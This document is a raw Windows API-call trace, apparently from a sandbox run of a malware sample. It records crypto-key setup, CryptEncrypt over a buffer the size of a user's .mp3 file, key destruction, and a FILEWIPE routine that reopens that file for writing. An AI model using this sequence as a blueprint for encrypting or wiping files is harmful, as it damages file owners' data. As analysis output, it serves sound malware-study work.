PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.762] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.762] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.762] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.762] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.762] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.763] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.763] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.763] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.763] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.763] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.764] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x152c0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x152d0) returned 1 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0037.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.764] CharLowerBuffW (in: lpsz="byte[86737]", cchLength=0xb | out: lpsz="byte[86737]") returned 0xb [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.769] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95f598*, pdwDataLen=0x6ae220*=0x152c0, dwBufLen=0x152d0 | out: pbData=0x95f598*, pdwDataLen=0x6ae220*=0x152d0) returned 1 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.772] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.785] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.785] CryptDestroyKey (hKey=0x7c2200) returned 1 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.785] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.785] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.785] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.786] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.786] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.787] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x3da53760, ftLastWriteTime.dwHighDateTime=0x1d5b9b3, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0x7c2100 [0037.787] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.787] CharLowerBuffW (in: lpsz="byte[86720]", cchLength=0xb | out: lpsz="byte[86720]") returned 0xb [0037.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.788] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.788] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.788] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da3b8 [0037.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da3b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.788] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.788] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.788] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.789] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0037.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x8891d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0037.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\shi6u88nczyga2zyk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.789] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.791] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 